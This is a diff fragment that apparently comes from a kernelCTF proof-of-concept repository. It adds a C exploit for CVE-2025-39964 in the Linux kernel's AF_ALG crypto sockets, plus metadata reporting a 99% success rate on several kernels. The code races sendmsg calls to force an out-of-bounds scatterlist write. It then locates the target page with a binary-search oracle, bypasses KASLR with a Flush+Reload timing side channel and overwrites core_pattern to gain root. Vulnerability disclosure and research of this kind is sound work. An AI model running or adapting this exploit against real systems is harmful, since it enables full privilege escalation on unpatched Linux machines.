perror("socket"); + return 1; + } + + if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) { + perror("bind"); + close(tfmfd); + return 1; + } + + unsigned char key[32] = {0}; + if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) { + perror("setsockopt"); + close(tfmfd); + return 1; + } + + opfd = accept(tfmfd, NULL, 0); + if (opfd == -1) { + perror("accept"); + close(tfmfd); + return 1; + } + + int val = 0x1000; + + struct { + struct cmsghdr cmsg; + __u32 op; + __u32 ivlen; + unsigned char iv[16]; + } __attribute__((__packed__)) msg; + + memset(&msg, 0, sizeof(msg)); + msg.cmsg.cmsg_level = SOL_ALG; + msg.cmsg.cmsg_type = ALG_SET_OP; + msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16); + + msg.op = ALG_OP_ENCRYPT; + msg.ivlen = 16; + memset(msg.iv, 0x01, 16); + + struct iovec iov = { + .iov_base = buf, + .iov_len = 0x1000, + }; + + struct msghdr msgh; + memset(&msgh, 0, sizeof(msgh)); + msgh.msg_iov = &iov; + msgh.msg_iovlen = 1; + msgh.msg_control = &msg; + msgh.msg_controllen = msg.cmsg.cmsg_len; + + /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */ + ssize_t n = sendmsg(opfd, &msgh, MSG_MORE); + printf("init %ld\n", n); + + /* + * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using + * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg + * entry (cur++); each recv drains the processed entry so the socket stays + * writable. The loop comment in the original PR is: + * "the loop with 0x7b + the sendmsg and send calls executes 125 times, + * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125." 
+ */ + for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) { + SYSCHK(send(opfd, buf, 0x1000, MSG_MORE)); + n = recv(opfd, buf, 0x1000, 0); + } + + /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is + * full) */ + send(opfd, buf, 0x1000, MSG_MORE); + SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val))); + printf("setsockopt done\n"); + + /* + * Step 3 (race): fork two children that race each other: + * + * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes + * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail + * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0. + * + * Child B (send 0x200 bytes): sends a sub-page-size buffer so that + * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126. + * + * Desired outcome: both children finish such that ctx->merge == 1 AND the + * last tsgl has sgl->cur == 0. The next send() will then use sg[-1]. + */ + if (fork() == 0) { + /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */ + int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE); + printf("send3 %d\n", x); + exit(0); + } + + if (fork() == 0) { + /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to + * MAX_SGL_ENTS */ + int x = send(opfd, buf, 0x200, MSG_MORE); + printf("send2 %d\n", x); + exit(0); + } + + /* + * @sleep(desc="wait for both fork children to reach their send() calls and + * set ctx->merge=1 with sgl->cur=0 before we recv()") + */ + sleep(1); + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + wait(NULL); + + /* Step 4: release spray threads so they re-send their crafted payloads */ + for (int i = 0; i < THREAD_NUM; i++) { + write(cfd[1], buf, 1); + } + + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + + memset(buf, 'z', 0x1000); + wait(NULL); + + /* Step 5: map userspace oracle region for the binary search */ + allocate_map(); + + /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses 
+ * sg[-1].page_link from our sprayed payload — triggering the OOB write. + * The check below treats a return value of 1 as a failed race and exits; + * any other result lets the exploit continue to the oracle search. + */ + int x = send(opfd, buf, 1, MSG_MORE); + + if (x == 1) { + puts("Race fail"); + exit(0); + } + + /* + * Step 5 (binary search oracle): + * + * Background: + * sg[-1].page_link is effectively a pointer to a struct page in vmemmap. + * The kernel computes the write destination as: + * dest = page_address(sg_page(sg)) + sg->offset + sg->length + * = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE + * + offset + length + * With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and + * (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our + * userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR). + * + * Oracle: + * send() returns 1 → the write destination is in a mapped page (success). + * send() returns -1 → the destination is unmapped (copy_from_user failed). + * By progressively munmap-ing halves of the oracle region we can determine + * which physical page corresponds to the OOB write target. + * + * Binary search (8 iterations → narrows range from SCAN_END_ADDR to + * SCAN_END_ADDR >> 8 = 0x5000000000 bytes, i.e. 320 GiB): + * Each iteration j tests: "if I decrease page_link by half_range/64, does + * the write still succeed?" + * - Decreasing page_link by Δ shifts dest by Δ*64 bytes (each 64-byte + * struct page step in page_link moves dest by one PAGE_SIZE). + * - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals + * half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units. + * If the shifted oracle still succeeds → dest is in the *upper* half → + * unmap the lower half and advance start. + * Otherwise → dest is in the *lower* half → unmap the upper half. 
+ */ + size_t oracle; + size_t leak_offset = 0; + int xcnt = 0; + for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6); + write(cfd[1], buf, 0x100); + buf[0] = 'a'; + x = send(opfd, buf, 1, MSG_MORE); + if (x == 1) { + puts(""); + xcnt++; + oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET]; + char *start = (void *)(0ULL); + for (int j = 0; j < 8; j++) { + printf("loop j: %d\n", j); + x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j))); + if (x == 1) { + xcnt++; + start += (SCAN_END_ADDR >> (1 + j)); /* upper half */ + munmap(start - (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } else { + munmap(start + (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + /* search_offset returns the exact userspace VA of the OOB-written page */ + leak_offset = search_offset(start) + xcnt; + printf("leak_offset %zx\n", leak_offset); + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + + break; + } + } + + if (leak_offset == 0) + exit(0); + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + write(cfd[1], buf, 0x100); + + /* + * Step 6: redirect the OOB write to core_pattern. + * + * leak_offset is the VA of the currently-targeted physical page. + * core_pattern is the KASLR-adjusted kernel VA of core_pattern[]. + * + * First, align within-page: send adjust_offset bytes so that after the + * advance the write starts at the same within-page offset as core_pattern. 
+ */ + size_t adjust_offset = + PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK); + leak_offset += adjust_offset; + + memset(buf, 'z', 0x1000); + SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE)); + SYSCHK(send(opfd, buf, 1, MSG_MORE)); + + printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1)); + if (*(char *)(leak_offset - 1) != 'z') + leak_offset -= 0x100000000ULL; + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + + /* + * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that + * page_address(sg_page(sg)) points to the physical page holding core_pattern. + * The >> 6 (or / 64) is actually a simplification of the formula + * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page + * index, and then multiply by 64 because each memory page has a page_struct + * that is exactly 64 bytes long. + * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via + * the formula described in the binary search comment above. 
+ */ + + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] += + (((core_pattern & ~0xfff) - (leak_offset & ~0xfff)) >> 6); + + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + write(cfd[1], buf, 0x100); + /* Step 6 (write): send the core_pattern string; kernel copies it to + * core_pattern[] */ + char mcore[64] = "|/proc/%P/fd/666 %P"; + SYSCHK(send(opfd, mcore, 64, MSG_MORE)); + PAUSE; + + return 0; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +void prefetch(void *p) { + asm volatile("prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : + : "r"(p)); +} + +size_t flushandreload(void *addr) /* row miss */ +{ + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +/* + * KASLR bypass via Flush+Reload side channel. + * + * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances). + * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant. + * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching + * source. 
+ */ +// #define KASLR_BYPASS_INTEL +/* + * Returns base unchanged when it is non-zero. Otherwise times prefetches of + * candidate kernel-text addresses (flushandreload), picks one candidate per + * trial, and returns the candidate that wins a strict majority of trials, + * retrying until one does. + */ +size_t bypass_kaslr(u64 base) { + if (!base) { +#ifdef KASLR_BYPASS_INTEL +#define OFFSET 0 +#define START (0xffffffff81000000ull + OFFSET) +#define END (0xffffffffD0000000ull + OFFSET) +#define STEP 0x0000000001000000ull + while (1) { + u64 bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + /* signed so the "nothing found" check below can actually fire */ + int mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + bases[vote] = addrs[mini]; + } + + /* Boyer-Moore majority vote: a newly adopted candidate starts with one + * vote, otherwise the counter never leaves 0 and the last trial always + * wins */ + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + c = 1; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + /* confirm the candidate really holds a strict majority */ + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#else +#define START (0xffffffff81000000ull) +#define END (0xffffffffc0000000ull) +#define STEP 0x0000000000200000ull +#define NUM_TRIALS 9 +/* largest contiguous mapped area at the beginning of _stext */ +#define WINDOW_SIZE 11 + + while (1) { + u64 bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti 
< ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) { + sum += times[ti + i]; + } + if (sum > max) { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + /* Boyer-Moore majority vote: a newly adopted candidate starts with one + * vote, otherwise the counter never leaves 0 and the last trial always + * wins */ + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + c = 1; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + /* confirm the candidate really holds a strict majority */ + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#endif + } + +got_base: + + printf("using kernel base %llx\n", base); + + return base; +} diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json new file mode 100644 index 000000000..304179dc7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json @@ -0,0 +1,34 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ "exp413","exp415"], + "vulnerability": { + "cve": "CVE-2025-39964", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1b34cbbf4f011a121ef7b2d7d6e6920a036d5285", + "affected_versions": ["2.6.36 - 6.16"], + "requirements": { + "attack_surface": [], + "capabilities": [], + "kernel_config": ["CONFIG_CRYPTO_USER_API"] + } + }, + "exploits": { + "lts-6.12.44": { + "environment": "lts-6.12.44", + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "99% success rate" + }, + "mitigation-v4-6.6": { + "environment": "mitigation-v4-6.6", + "uses": [], + 
"requires_separate_kaslr_leak": false, + "stability_notes": "99% success rate" + }, + "cos-121-18867.199.28": { + "environment": "cos-121-18867.199.28", + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "99% success rate" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz new file mode 100755 index 000000000..07252dbed Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz new file mode 100755 index 000000000..07252dbed Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz differ